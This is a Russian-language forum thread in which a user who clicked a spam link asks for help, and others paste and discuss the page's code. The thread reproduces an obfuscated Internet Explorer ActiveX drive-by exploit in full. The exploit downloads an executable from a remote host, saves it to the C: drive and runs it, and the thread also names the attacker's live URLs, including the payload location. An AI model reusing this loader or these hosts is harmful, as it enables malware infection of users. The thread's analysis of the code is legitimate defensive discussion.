Думал друг кинул сообщение с ссылкой так как он мне писал и в этот же момент пришла мессага от спамбота , я не заметил. Но перед тем как нажать проверил онлайн докторомвебом мне ничего не выдало и нажал :((
Эта ссылка ( не нажимать , кто не в теме ) (http://myphotos.myokhost.com/index.php) Там пустая страница и смайлик слева.

Может кто проверить , есть там что ? Стоит последняя лиса и za .

смайл типа тебя поимели

Просмотри хтмлку и скопируй сюда

вот там што )))
function ZLFZz(){
try {
var efds='';

var aZxrwkh = document.createElement("obj"+efds+"e"+efds+"ct");
aZxrwkh.setAttribute("id","a"+efds+"Zx"+efds+"rwkh");
aZxrwkh.setAttribute("class"+efds+"id","cls"+efds+"i"+efds+"d"+efds+":"+efds+"B"+efds+"D"+efds+"9"+efds+"6C5"+efds+"56-65A3"+efds+"-"+efds+"11D0-"+efds+"983"+efds+"A"+efds+"-"+efds+"00C"+efds+"04FC29E36");
var EkbSUoL = aZxrwkh.CreateObject("adodb"+efds+".stream",'');
var PEELt6 = aZxrwkh.CreateObject("S"+efds+"h"+efds+"el"+efds+"l"+efds+"."+efds+"A"+efds+"pplic"+efds+"ati"+efds+"on",'');
var dnigvr = aZxrwkh.CreateObject("msxml"+efds+"2"+efds+".X"+efds+"ML"+efds+"H"+efds+"T"+efds+"T"+efds+"P",'');
var jx89msS;
jx89msS=document.getElementById("sR28nH").innerText;

dnigvr.open("G"+efds+"E"+efds+"T",jx89msS,false);
dnigvr.send();
EkbSUoL.type = 1;
EkbSUoL.open();
EkbSUoL.Write(dnigvr.responseBody);
Frogxa = "c:\\S87ekhV.exe";
EkbSUoL.SaveToFile(Frogxa,2);
eval("PEE"+efds+"Lt6.Shel"+efds+"lExec"+efds+"ute("+efds+"F"+efds+"rog"+efds+"xa);");
}
catch(e) {window.location="bof.php"};
}
сплоент какой то ... через адодб

Типо должен был у тебя бразуер подвиснуть :)

И всё :) ? Он внедрился в систему ? Его надо удалять?

он качает какуюто заразу(dnigvr.open("G"+efds+"E"+efds+"T",jx89msS,false);)
потом сохраняет в корень С
и запускает.

отработал через эксплорер . про файрфокс не знаю.

И всё :) ? Он внедрился в систему ? Его надо удалять?
аааа он внедрился к тебе! Мы все умрём!!!!!
=)))
на самом деле установи норм антивирь и он всё заблочит

Ахтунг. Что делать?

var EkbSUoL
имена функций ппц =) какой то супер тарабарщ кодер ваял =))
--
Ну короче если не пострчно и не вникая во все эти стршные переменные, разобратся то сделалось слудующее:
Функция, в ней сздается элемент(и не один), который в совю очередь на паге фигачит злодеяния(непонятные из за имен переменных(сложно разобратся)), потом короче все это сзодеяние незаметно для тебя открывается, так же открывая с собой файл(похоу вир0с) и отсылая и сохраня его тебе..в самом конце на скрипт bof.php
--
Короче вир0с ты поймал 99%

Почиститься тебе надо

сам пайлоад лежит тут http://myphotos.myokhost.com/exe.php
тока запускать его не надо


Авира палит его как
TR/Crypt.XPACK.Gen - Trojan

Это vbscript, cплоит только под ie.имена функций ппц =) какой то супер тарабарщ кодер ваял =))Они рандомные.

Они стебут тебя, должен переполнится буфер!